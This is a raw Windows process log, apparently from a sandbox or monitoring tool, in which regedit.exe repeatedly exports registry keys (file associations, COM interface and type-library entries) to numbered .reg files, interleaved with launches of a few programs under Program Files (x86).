/e "443.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\vstoee.dll"
C:\Windows\SysWOW64\regedit.exe
/e "444.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\table30.exe"
C:\Windows\SysWOW64\regedit.exe
/e "445.reg" "HKEY_CLASSES_ROOT\.nls"
C:\Windows\SysWOW64\regedit.exe
/e "446.reg" "HKEY_CLASSES_ROOT\.lzh"
C:\Windows\SysWOW64\regedit.exe
/e "447.reg" "HKEY_CLASSES_ROOT\.jod"
C:\Windows\SysWOW64\regedit.exe
/e "448.reg" "HKEY_CLASSES_ROOT\.oxps"
C:\Windows\SysWOW64\regedit.exe
/e "449.reg" "HKEY_CLASSES_ROOT\.stl"
C:\Windows\SysWOW64\regedit.exe
/e "450.reg" "HKEY_CLASSES_ROOT\.rar"
C:\Windows\SysWOW64\regedit.exe
/e "451.reg" "HKEY_CLASSES_ROOT\.ply"
C:\Windows\SysWOW64\regedit.exe
/e "452.reg" "HKEY_CLASSES_ROOT\.exc"
C:\Windows\SysWOW64\regedit.exe
/e "453.reg" "HKEY_CLASSES_ROOT\.dsn"
C:\Windows\SysWOW64\regedit.exe
/e "454.reg" "HKEY_CLASSES_ROOT\.dctxc"
C:\Windows\SysWOW64\regedit.exe
/e "455.reg" "HKEY_CLASSES_ROOT\.fbx"
C:\Windows\SysWOW64\regedit.exe
/e "456.reg" "HKEY_CLASSES_ROOT\.imesx"
C:\Windows\SysWOW64\regedit.exe
/e "457.reg" "HKEY_CLASSES_ROOT\.gltf"
C:\Windows\SysWOW64\regedit.exe
/e "458.reg" "HKEY_CLASSES_ROOT\.glb"
C:\Windows\SysWOW64\regedit.exe
/e "459.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A3-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "460.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A2-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "461.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A1-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "462.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A4-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "463.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A7-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "464.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A6-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "465.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A5-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "466.reg" "HKEY_CLASSES_ROOT\Interface\{000C0397-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "467.reg" "HKEY_CLASSES_ROOT\Interface\{000C0396-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "468.reg" "HKEY_CLASSES_ROOT\Interface\{000C0395-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "469.reg" "HKEY_CLASSES_ROOT\Interface\{000C0398-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "470.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A0-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "471.reg" "HKEY_CLASSES_ROOT\Interface\{000C039A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "472.reg" "HKEY_CLASSES_ROOT\Interface\{000C0399-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "473.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C1-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "474.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C0-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "475.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BF-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "476.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C2-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "477.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C5-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "478.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C4-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "479.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C3-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "480.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BA-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "481.reg" "HKEY_CLASSES_ROOT\Interface\{000C03B9-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "482.reg" "HKEY_CLASSES_ROOT\Interface\{000C03B2-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "483.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BB-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "484.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BE-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "485.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BD-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "486.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BC-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "487.reg" "HKEY_CLASSES_ROOT\Interface\{000C0393-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "488.reg" "HKEY_CLASSES_ROOT\Interface\{000C037D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "489.reg" "HKEY_CLASSES_ROOT\Interface\{000C037C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "490.reg" "HKEY_CLASSES_ROOT\Interface\{000C037B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "491.reg" "HKEY_CLASSES_ROOT\Interface\{000C037E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "492.reg" "HKEY_CLASSES_ROOT\Interface\{000C0381-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "493.reg" "HKEY_CLASSES_ROOT\Interface\{000C0380-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "494.reg" "HKEY_CLASSES_ROOT\Interface\{000C037F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "495.reg" "HKEY_CLASSES_ROOT\Interface\{000C0375-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "496.reg" "HKEY_CLASSES_ROOT\Interface\{000C0373-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "497.reg" "HKEY_CLASSES_ROOT\Interface\{000C0372-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "498.reg" "HKEY_CLASSES_ROOT\Interface\{000C0376-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "499.reg" "HKEY_CLASSES_ROOT\Interface\{000C037A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "500.reg" "HKEY_CLASSES_ROOT\Interface\{000C0379-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "501.reg" "HKEY_CLASSES_ROOT\Interface\{000C0377-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "502.reg" "HKEY_CLASSES_ROOT\Interface\{000C038E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "503.reg" "HKEY_CLASSES_ROOT\Interface\{000C038C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "504.reg" "HKEY_CLASSES_ROOT\Interface\{000C038B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "505.reg" "HKEY_CLASSES_ROOT\Interface\{000C038F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "506.reg" "HKEY_CLASSES_ROOT\Interface\{000C0392-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "507.reg" "HKEY_CLASSES_ROOT\Interface\{000C0391-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "508.reg" "HKEY_CLASSES_ROOT\Interface\{000C0390-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "509.reg" "HKEY_CLASSES_ROOT\Interface\{000C0386-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "510.reg" "HKEY_CLASSES_ROOT\Interface\{000C0385-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "511.reg" "HKEY_CLASSES_ROOT\Interface\{000C0382-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "512.reg" "HKEY_CLASSES_ROOT\Interface\{000C0387-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\PROGRA~2\GAIN\fsg.exe
"C:\PROGRA~2\GAIN\fsg.exe"
\??\c:\program files (x86)\gain\fsg_4201a.exe
"c:\program files (x86)\gain\fsg_4201a.exe"
C:\Windows\SysWOW64\regedit.exe
/e "513.reg" "HKEY_CLASSES_ROOT\Interface\{000C038A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "514.reg" "HKEY_CLASSES_ROOT\Interface\{000C0389-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "515.reg" "HKEY_CLASSES_ROOT\Interface\{000C0388-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "516.reg" "HKEY_CLASSES_ROOT\Interface\{000C1709-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "517.reg" "HKEY_CLASSES_ROOT\Interface\{000C1534-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "518.reg" "HKEY_CLASSES_ROOT\Interface\{000C1533-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "519.reg" "HKEY_CLASSES_ROOT\Interface\{000C170B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "520.reg" "HKEY_CLASSES_ROOT\Interface\{000C1711-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "521.reg" "HKEY_CLASSES_ROOT\Interface\{000C1710-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "522.reg" "HKEY_CLASSES_ROOT\Interface\{000C170F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "523.reg" "HKEY_CLASSES_ROOT\Interface\{000C0936-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "524.reg" "HKEY_CLASSES_ROOT\Interface\{000C0914-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "525.reg" "HKEY_CLASSES_ROOT\Interface\{000C0913-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "526.reg" "HKEY_CLASSES_ROOT\Interface\{000C101D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "527.reg" "HKEY_CLASSES_ROOT\Interface\{000C1532-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "528.reg" "HKEY_CLASSES_ROOT\Interface\{000C1531-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "529.reg" "HKEY_CLASSES_ROOT\Interface\{000C1530-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "530.reg" "HKEY_CLASSES_ROOT\Interface\{000C1723-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "531.reg" "HKEY_CLASSES_ROOT\Interface\{000C171C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "532.reg" "HKEY_CLASSES_ROOT\Interface\{000C171B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "533.reg" "HKEY_CLASSES_ROOT\Interface\{000C1724-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "534.reg" "HKEY_CLASSES_ROOT\Interface\{000C1727-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "535.reg" "HKEY_CLASSES_ROOT\Interface\{000C1726-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "536.reg" "HKEY_CLASSES_ROOT\Interface\{000C1725-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "537.reg" "HKEY_CLASSES_ROOT\Interface\{000C1714-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "538.reg" "HKEY_CLASSES_ROOT\Interface\{000C1713-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "539.reg" "HKEY_CLASSES_ROOT\Interface\{000C1712-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "540.reg" "HKEY_CLASSES_ROOT\Interface\{000C1715-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "541.reg" "HKEY_CLASSES_ROOT\Interface\{000C1718-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "542.reg" "HKEY_CLASSES_ROOT\Interface\{000C1717-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "543.reg" "HKEY_CLASSES_ROOT\Interface\{000C1716-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "544.reg" "HKEY_CLASSES_ROOT\Interface\{000C0411-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "545.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CF-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "546.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CE-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "547.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CD-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "548.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D0-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "549.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D3-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "550.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D2-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "551.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D1-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "552.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C8-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "553.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C7-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "554.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C6-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "555.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C9-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "556.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CC-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "557.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CB-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "558.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CA-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "559.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E5-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "560.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E4-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "561.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E3-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "562.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E6-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "563.reg" "HKEY_CLASSES_ROOT\Interface\{000C0410-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "564.reg" "HKEY_CLASSES_ROOT\Interface\{000C03F1-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "565.reg" "HKEY_CLASSES_ROOT\Interface\{000C03F0-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "566.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D6-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "567.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D5-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "568.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D4-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "569.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D7-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "570.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E2-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "571.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E1-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "572.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E0-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "573.reg" "HKEY_CLASSES_ROOT\Interface\{000C0371-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "574.reg" "HKEY_CLASSES_ROOT\Interface\{0002E18C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "575.reg" "HKEY_CLASSES_ROOT\Interface\{0002E188-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "576.reg" "HKEY_CLASSES_ROOT\Interface\{0002E17E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "577.reg" "HKEY_CLASSES_ROOT\Interface\{000672AC-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "578.reg" "HKEY_CLASSES_ROOT\Interface\{000C0301-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "579.reg" "HKEY_CLASSES_ROOT\Interface\{000C0300-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "580.reg" "HKEY_CLASSES_ROOT\Interface\{000672AD-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "581.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "582.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "583.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "584.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "585.reg" "HKEY_CLASSES_ROOT\Interface\{0002E17A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "586.reg" "HKEY_CLASSES_ROOT\Interface\{0002E176-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "587.reg" "HKEY_CLASSES_ROOT\Interface\{0002E172-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "588.reg" "HKEY_CLASSES_ROOT\Interface\{000C0311-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "589.reg" "HKEY_CLASSES_ROOT\Interface\{000C0310-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "590.reg" "HKEY_CLASSES_ROOT\Interface\{000C030E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "591.reg" "HKEY_CLASSES_ROOT\Interface\{000C0312-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "592.reg" "HKEY_CLASSES_ROOT\Interface\{000C0315-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "593.reg" "HKEY_CLASSES_ROOT\Interface\{000C0314-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "594.reg" "HKEY_CLASSES_ROOT\Interface\{000C0313-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "595.reg" "HKEY_CLASSES_ROOT\Interface\{000C0306-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "596.reg" "HKEY_CLASSES_ROOT\Interface\{000C0304-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "597.reg" "HKEY_CLASSES_ROOT\Interface\{000C0302-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "598.reg" "HKEY_CLASSES_ROOT\Interface\{000C0308-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "599.reg" "HKEY_CLASSES_ROOT\Interface\{000C030D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "600.reg" "HKEY_CLASSES_ROOT\Interface\{000C030C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "601.reg" "HKEY_CLASSES_ROOT\Interface\{000C030A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "602.reg" "HKEY_CLASSES_ROOT\Interface\{0002E167-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "603.reg" "HKEY_CLASSES_ROOT\Interface\{00000500-0000-0010-8000-00AA006D2EA4}\ProxyStubClsid"
C:\PROGRA~2\CPUROC~1\CPUROC~1.EXE
"C:\PROGRA~2\CPUROC~1\CPUROC~1.EXE"
C:\Windows\SysWOW64\regedit.exe
/e "604.reg" "HKEY_CLASSES_ROOT\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\HelpDir"
C:\Windows\SysWOW64\regedit.exe
/e "605.reg" "HKEY_CLASSES_ROOT\TypeLib\{7CD06992-50AA-11D1-B8F0-00A0C9259304}\1.0\HelpDir"
C:\Windows\SysWOW64\regedit.exe
/e "606.reg" "HKEY_CLASSES_ROOT\Interface\{00000500-0000-0010-8000-00AA006D2EA4}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "607.reg" "HKEY_CLASSES_ROOT\Interface\{0002E115-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "608.reg" "HKEY_CLASSES_ROOT\Interface\{0002E113-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "609.reg" "HKEY_CLASSES_ROOT\Interface\{0002E103-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "610.reg" "HKEY_CLASSES_ROOT\CLSID\{663e1a94-a37e-4e8a-9e55-5354b2139790}\InprocServer32"
C:\Windows\SysWOW64\regedit.exe
/e "611.reg" "HKEY_CLASSES_ROOT\CLSID\{3F052B8E-512B-419D-9E06-9B9ADDC7118C}\InprocServer32"
C:\Windows\SysWOW64\regedit.exe
/e "612.reg" "HKEY_CLASSES_ROOT\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32"
C:\Windows\SysWOW64\regedit.exe
/e "613.reg" "HKEY_CLASSES_ROOT\TypeLib\{0002E157-0000-0000-C000-000000000046}\5.3\HelpDir"
C:\Windows\SysWOW64\regedit.exe
/e "614.reg" "HKEY_CLASSES_ROOT\TypeLib\{41738EEA-442F-477F-92CF-2889BD6CD7E7}\1.0\HelpDir"
C:\Windows\SysWOW64\regedit.exe
/e "615.reg" "HKEY_CLASSES_ROOT\TypeLib\{3120BA9F-4FC8-4A4F-AE1E-02114F421D0A}\1.0\HelpDir"
C:\Windows\SysWOW64\regedit.exe
/e "616.reg" "HKEY_CLASSES_ROOT\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\HelpDir"
C:\Windows\SysWOW64\regedit.exe
/e "617.reg" "HKEY_CLASSES_ROOT\Interface\{0002E162-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "618.reg" "HKEY_CLASSES_ROOT\Interface\{0002E161-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "619.reg" "HKEY_CLASSES_ROOT\Interface\{0002E160-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "620.reg" "HKEY_CLASSES_ROOT\Interface\{0002E163-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "621.reg" "HKEY_CLASSES_ROOT\Interface\{0002E166-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "622.reg" "HKEY_CLASSES_ROOT\Interface\{0002E165-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "623.reg" "HKEY_CLASSES_ROOT\Interface\{0002E164-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "624.reg" "HKEY_CLASSES_ROOT\Interface\{0002E11A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
